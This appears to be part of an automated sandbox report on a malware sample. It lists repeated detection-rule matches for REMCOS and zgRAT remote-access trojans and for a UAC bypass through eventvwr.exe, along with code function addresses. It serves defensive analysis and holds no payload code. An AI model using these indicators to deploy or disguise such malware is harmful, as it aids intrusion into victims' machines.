Source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.Qerdo.exe.5440000.4.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.Qerdo.exe.48f0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.Qerdo.exe.48f0000.4.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.kyFBQxVbsg.exe.4ba0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.kyFBQxVbsg.exe.4ba0000.4.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.Qerdo.exe.5440000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000013.00000002.606363285.00000000048F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000000.00000002.541870137.0000000004BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000018.00000002.613026227.0000000005440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown

.NET source code contains very large array initializations

Source: kyFBQxVbsg.exe, hlrb.cs	Large array initialization: nakj: array initializer size 710623
Source: 19.2.Qerdo.exe.40000.0.unpack, hlrb.cs	Large array initialization: nakj: array initializer size 710623

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Code function: 0_2_024AEAB8	0_2_024AEAB8
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Code function: 0_2_024ADA50	0_2_024ADA50
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Code function: 0_2_024AD778	0_2_024AD778
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00C8EAF7	3_2_00C8EAF7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00C8AEC8	3_2_00C8AEC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00C8AF53	3_2_00C8AF53
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00C8768A	3_2_00C8768A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00C87698	3_2_00C87698
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00C8AF90	3_2_00C8AF90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00435080	17_2_00435080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0044F09C	17_2_0044F09C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0043420E	17_2_0043420E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00430294	17_2_00430294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_004422B0	17_2_004422B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00411466	17_2_00411466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0041A4FE	17_2_0041A4FE
